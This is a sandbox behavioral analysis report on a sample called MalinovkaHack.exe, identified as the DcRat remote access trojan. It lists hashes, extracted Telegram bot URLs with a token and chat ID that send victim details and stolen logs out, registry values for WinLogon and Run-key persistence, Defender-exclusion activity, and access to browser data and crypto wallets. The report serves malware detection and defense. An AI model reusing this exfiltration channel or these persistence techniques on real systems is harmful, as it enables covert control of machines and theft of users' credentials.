Analysis
-
max time kernel
1800s -
max time network
1801s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 15:38
Behavioral task
behavioral1
Sample
MalinovkaHack.exe
Resource
win10v2004-20240709-en
General
-
Target
MalinovkaHack.exe
-
Size
2.3MB
-
MD5
684d0c5b768a7de891ff7a6c1d7a0e52
-
SHA1
2073f2f64ef0f225320b441307d31d7f70412311
-
SHA256
66f35f9abdbb58a53ad4c323ef2dc17d3dc11808d5ffaec3e7f8192845e7c762
-
SHA512
beef37964f1c1a3c059938216a270d38c6687b22b401dae7f086496a6ce6ff8028988cae267c82491c5d5984b329a7e4ff63679df7f0bf74b430281e40521138
-
SSDEEP
49152:bbA35OY/GyEjrK5Ul5ja45+CGml000ds/rczenW:bbJQGykrK5UlQZCH0dsTcKnW
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendPhoto?chat_id=6513322270&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20EPDFAWZF%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%20(x86)%5CWindows%20Portable%20Devices%5CTrustedInstaller.ex
https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendDocument?chat_id=6513322270&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A25.858979
https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendDocument?chat_id=6513322270&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A13.138164
https://api.telegram.org/bot6821098798:AAEPdYJUdZDsDCC00Cx9TM24038Y6NPblq4/sendDocument?chat_id=6513322270&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20bfbf2dd14f799665295d0dc2aa89de026a07fe37%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A12.502781
Signatures
-
DcRat 22 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 5000 schtasks.exe 3180 schtasks.exe 2232 schtasks.exe 4020 schtasks.exe 1956 schtasks.exe 184 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation MalinovkaHack.exe 3484 schtasks.exe 3744 schtasks.exe 3208 schtasks.exe 4828 schtasks.exe 4576 schtasks.exe 1924 schtasks.exe 3392 schtasks.exe 2324 schtasks.exe 2328 schtasks.exe 2368 schtasks.exe 3720 schtasks.exe 1396 schtasks.exe 856 schtasks.exe 4264 schtasks.exe 1448 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\"" taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\TrustedInstaller.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\SearchApp.exe\"" TrustedInstaller.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\"" TrustedInstaller.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\TrustedInstaller.exe\", \"C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\SearchApp.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\TrustedInstaller.exe\", \"C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\SearchApp.exe\"" TrustedInstaller.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\"" dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\sysmon.exe\", \"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\", \"C:\\winSvc\\SearchApp.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\"" Providersvc.exe -
Process spawned unexpected child process 33 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3484 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2328 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 856 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3180 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1448 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 184 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3744 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3208 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2368 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2324 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4576 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4828 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4264 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3392 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5000 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2232 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2596 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1712 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 676 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5696 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5704 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5756 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2036 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5740 2600 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5236 376 schtasks.exe 207 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3944 376 schtasks.exe 207 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5852 376 schtasks.exe 207 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4000 376 schtasks.exe 207 -
resource yara_rule behavioral1/files/0x0007000000023485-10.dat dcrat behavioral1/memory/4400-13-0x0000000000830000-0x0000000000A3A000-memory.dmp dcrat behavioral1/files/0x000800000002349c-176.dat dcrat behavioral1/memory/5584-549-0x0000000000280000-0x000000000048A000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3708 powershell.exe 3256 powershell.exe 2576 powershell.exe 2788 powershell.exe 4456 powershell.exe 4012 powershell.exe 1544 powershell.exe 1656 powershell.exe 2720 powershell.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation Providersvc.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation Providersvc.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation TrustedInstaller.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation dllhost.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation taskhostw.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation MalinovkaHack.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 12 IoCs
pid Process 4400 Providersvc.exe 1356 Providersvc.exe 3620 TrustedInstaller.exe 5512 taskhostw.exe 5764 dllhost.exe 1028 SearchApp.exe 6112 TrustedInstaller.exe 5584 sysmon.exe 244 taskhostw.exe 4288 dllhost.exe 3652 taskhostw.exe 2792 sysmon.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\SearchApp.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Recovery\\WindowsRE\\sysmon.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Program Files (x86)\\Windows Portable Devices\\TrustedInstaller.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\dllhost.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\winSvc\\SearchApp.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\SearchApp.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Recovery\\WindowsRE\\sysmon.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\winSvc\\SearchApp.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\"" Providersvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhostw.exe\"" Providersvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller = "\"C:\\Program Files (x86)\\Windows Portable Devices\\TrustedInstaller.exe\"" Providersvc.exe -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 35 ipinfo.io 36 ipinfo.io 129 ipinfo.io 130 ipinfo.io 134 ipinfo.io 135 ipinfo.io 143 ipinfo.io 144 ipinfo.io -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe -
Drops file in Program Files directory 11 IoCs
description ioc Process File created C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe Providersvc.exe File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe Providersvc.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\RCXA5F8.tmp Providersvc.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe Providersvc.exe File opened for modification C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe Providersvc.exe File created C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe Providersvc.exe File created C:\Program Files (x86)\Windows Multimedia Platform\5940a34987c991 Providersvc.exe File created C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe Providersvc.exe File created C:\Program Files (x86)\Windows Portable Devices\04c1e7795967e4 Providersvc.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\ea9f0e6c9e2dcd Providersvc.exe File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\RCXA1EF.tmp Providersvc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133661365619736016" chrome.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings MalinovkaHack.exe Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings Providersvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Providersvc.exe Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000_Classes\Local Settings taskmgr.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3484 schtasks.exe 856 schtasks.exe 184 schtasks.exe 2368 schtasks.exe 4576 schtasks.exe 1396 schtasks.exe 1448 schtasks.exe 1924 schtasks.exe 2232 schtasks.exe 2328 schtasks.exe 1956 schtasks.exe 3744 schtasks.exe 3208 schtasks.exe 4828 schtasks.exe 3392 schtasks.exe 3180 schtasks.exe 3720 schtasks.exe 2324 schtasks.exe 4020 schtasks.exe 4264 schtasks.exe 5000 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 4400 Providersvc.exe 2720 powershell.exe 2720 powershell.exe 4012 powershell.exe 4012 powershell.exe 3256 powershell.exe 3256 powershell.exe 1656 powershell.exe 1656 powershell.exe 4400 Providersvc.exe 4400 Providersvc.exe 3708 powershell.exe 3708 powershell.exe 1544 powershell.exe 1544 powershell.exe 2720 powershell.exe 4012 powershell.exe 3256 powershell.exe 1656 powershell.exe 3708 powershell.exe 1544 powershell.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 1356 Providersvc.exe 1356 Providersvc.exe 1356 Providersvc.exe 1356 Providersvc.exe 1356 Providersvc.exe 3748 taskmgr.exe 1356 Providersvc.exe 1356 Providersvc.exe 1356 Providersvc.exe 1356 Providersvc.exe 3748 taskmgr.exe 1356 Providersvc.exe 2788 powershell.exe 2788 powershell.exe 1356 Providersvc.exe 1356 Providersvc.exe 2576 powershell.exe 2576 powershell.exe 4456 powershell.exe 4456 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 3620 TrustedInstaller.exe 4032 mmc.exe 3748 taskmgr.exe 4288 dllhost.exe 3652 taskhostw.exe 2792 sysmon.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3780 chrome.exe 3780 chrome.exe 3780 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4400 Providersvc.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 4012 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 1544 powershell.exe Token: SeDebugPrivilege 3748 taskmgr.exe Token: SeSystemProfilePrivilege 3748 taskmgr.exe Token: SeCreateGlobalPrivilege 3748 taskmgr.exe Token: SeDebugPrivilege 1356 Providersvc.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 3620 TrustedInstaller.exe Token: SeBackupPrivilege 4380 vssvc.exe Token: SeRestorePrivilege 4380 vssvc.exe Token: SeAuditPrivilege 4380 vssvc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe Token: 33 4032 mmc.exe Token: SeIncBasePriorityPrivilege 4032 mmc.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 4032 mmc.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
